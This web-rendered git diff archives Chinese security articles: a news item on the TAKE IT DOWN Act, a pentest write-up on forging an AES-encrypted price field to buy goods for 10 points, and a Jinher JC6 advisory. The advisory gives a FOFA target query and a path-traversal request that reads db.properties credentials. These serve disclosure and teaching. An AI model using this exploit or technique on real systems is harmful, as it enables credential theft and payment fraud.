4月28日,美国国会众议院通过《删除法案》(TAKE IT DOWN Act),其此前在参议院通过,现提交给特朗普总统签署。该法案全称为《应对网页及网站中深度伪造引发的性剥削工具法案》,明确将人工智能生成的信息内容纳入监管范围,旨在打击未经当事人同意传播裸照、私密视频等隐私内容,以及通过深度伪造技术合成色情内容的行为。法案强调“同意拍摄”不等于“同意传播”,要求网络平台建立快速响应机制,明确心理损害可作为定罪依据,并通过引入公共利益例外和司法审查加以平衡,进一步强化了平台责任和受害者救济。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.congress.gov/119/bills/s146/BILLS-119s146es.pdf
|
||||
|
||||
|
||||
**往期精彩推荐**
|
||||
|
||||
|
||||
[安全热点周报:黑客精心设计 Craft CMS 漏洞链,用于零日攻击窃取数据](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503347&idx=1&sn=3e8a4766a143c1ac8b60d02ae3610cc2&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
[安全热点周报:零日漏洞瞄准 iPhone,苹果紧急发布安全补丁](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503342&idx=1&sn=2e5b04fa739192fac3232716a4ffedda&scene=21#wechat_redirect)
|
||||
|
||||
[CVE计划停摆:全球漏洞治理体系面临协同危机](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503338&idx=1&sn=156adf75bc9f1344112970fb946cc863&scene=21#wechat_redirect)
|
||||
|
||||
|
||||
|
||||
本期周报内容由安全内参&虎符智库&奇安信CERT联合出品!
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
84
doc/2025-05/支付漏洞实战.md
Normal file
84
doc/2025-05/支付漏洞实战.md
Normal file
@ -0,0 +1,84 @@
|
||||
# 支付漏洞实战
|
||||
K1v1n 锐鉴安全 2025-05-06 16:00
|
||||
|
||||
声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
|
||||
|
||||
关注公众号,设置为星标,
|
||||
不定期有宠粉福利
|
||||
|
||||

|
||||
# 前言
|
||||
|
||||
这个漏洞是在工作中例行渗透测试的时候发现的,虽然前端做了防篡改措施,但这是很经典的没有后端校验导致的任意价格支付。
|
||||
|
||||
漏洞已在内部提交并确认修复。
|
||||
# 漏洞描述
|
||||
|
||||
兑换积分商品时数据包会携带extendKey ,在分析js代码时发现,其值是商品id、数量、商品价格、可用积分这几项的拼接值,再进行加密得到的。本意是使用extendKey实现数据包关键内容二次校验防篡改,但extendKey的加解密方式以及key均写在js代码中,这就使得extendKey的篡改变得可行。在兑换积分商品时经解密发现其值会携带商品价格信息,篡改后实现任意使用任意积分对商品的兑换。
|
||||
## 漏洞分析利用
|
||||
### 0x01 加解密说明
|
||||
|
||||
在js代码中找到extendKey的加密方式,可以看到用的是aes-128-ecb加密,密钥n也明文写在js代码中。
|
||||
|
||||

|
||||
|
||||
加密流程:先aes-128-ecb再base64编码。
|
||||
|
||||
解密流程:先base64解码再aes-128-ecb解密
|
||||
|
||||
对extendKey的值做解密验证
|
||||
|
||||

|
||||
|
||||
解密发现,原始字符串是将商品id和数量使用“|”做了拼接
|
||||
|
||||

|
||||
### 0x02 利用过程
|
||||
|
||||
账户中原始可用的积分
|
||||
|
||||

|
||||
|
||||
选择一个所需积分大于账户已有积分的商品,点击立即购买,拦截响应数据包
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
解密extendKey发现是 两个商品id+数量+商品积分价格 的组合字符串
|
||||
|
||||

|
||||
|
||||
修改字符串中最后一个值及价格为10,并重新生成extendKey
|
||||
|
||||

|
||||
|
||||
接着修改返回包中tradePointAmount的值为10,并填入篡改后的extendKey值
|
||||
|
||||

|
||||
|
||||
然后释放响应包前端出现提交订单页面,虽然前端显示的还是29900的价格,这是因为控制前端显示价格值的不是tradePointAmount这个键值
|
||||
|
||||

|
||||
|
||||
点击提交订单可以看到交易价格已经是10积分,从后续的响应包也可以确认这一点
|
||||
|
||||
|
||||
紧接着释放响应包,确认前端10积分的订单已经生成成功等待支付
|
||||
|
||||
|
||||
最后支付订单
|
||||
## 分析总结
|
||||
|
||||
这个漏洞就是经典的未对金额进行正确的后端校验,先从开发者的视角分析一下开发者的思路:
|
||||
1. 点击立即购买,请求带上商品id以及数量,向后端获得价格等信息。
|
||||
|
||||
1. 后端服务查询得到商品价格,返回前端,前端接收并校验为提交订单做准备。
|
||||
|
||||
1. 提交订单,前端传递“可靠”的价格值去请求订单处理服务,生成了支付订单。
|
||||
|
||||
第1步,前端认为应该先向后端询问商品价格,第2步完成时前端开发者视角下认为金额是后端传递给前端的且对金额数量等值做了加密,只要前端进行解密、校验,便认为是“可靠”的,到第3步向支付系统请求生成订单时,后端支付系统开发在对接时得知有个extendKey值可以做校验,也就放心的进行了价格校验。虽然也对价格等关键参数值做了加密、校验,但忽略了AES是对称加密,而js也未作混淆之类的处理,算法密钥以明文的形式暴露给攻击者,篡改extendKey轻而易举。问题就出在支付订单生成服务未在订单生成前在后端向商品价格的数据库查询做二次校验,而只是校验了前端传的值。开发时觉得,传参处处有校验==处处都可信,这是一个思维惯性,但必须要注意避免。
|
||||
### ps:
|
||||
|
||||
至于为什么要在第2步就修改金额,是因为前端有个账户积分和商品价格比较的机制,积分不足不会有下一步订单提交生成,如果商品原本价格就低于已有积分,那么直接从第3步修改金额就可以。
|
||||
|
54
doc/2025-05/金和JC6协同管理平台 oaplusrangedownloadfile 任意文件下载漏洞.md
Normal file
54
doc/2025-05/金和JC6协同管理平台 oaplusrangedownloadfile 任意文件下载漏洞.md
Normal file
@ -0,0 +1,54 @@
|
||||
# 金和JC6协同管理平台 oaplusrangedownloadfile 任意文件下载漏洞
|
||||
HK安全小屋 2025-05-06 15:12
|
||||
|
||||
免责声明
|
||||
|
||||
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
|
||||
|
||||
影响版本:
|
||||
|
||||
金和JC6协同管理平台
|
||||
|
||||
漏洞描述
|
||||
|
||||
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。金和JC6协同管理平台oaplusrangedownloadfile 存在文件下载漏洞,攻击者可利用该漏洞获取服务器敏感信息。
|
||||
|
||||
FOFA:
|
||||
```
|
||||
app="Jinher-OA"
|
||||
```
|
||||
|
||||
POC:
|
||||
```
|
||||
GET /jc6/JHSoft.WCF/login/oaplusrangedownloadfile?filename=../WEB-INF/classes/db.properties HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
```
|
||||
|
||||
读取db.properties文件可以获取数据库配置信息
|
||||
|
||||

|
||||
|
||||
****
|
||||
**修复建议**
|
||||
|
||||
1、关闭互联网暴露面或设置访问权限,禁止非管理IP访问对应页面。
|
||||
|
||||
2、关注厂商升级至安全版本,
|
||||
|
||||
3、及时联系官方获取更新补丁
|
||||
|
||||
|
||||
--------
|
||||
|
||||
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
|
||||
|
||||
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
|
||||
|
||||
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
|
||||
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user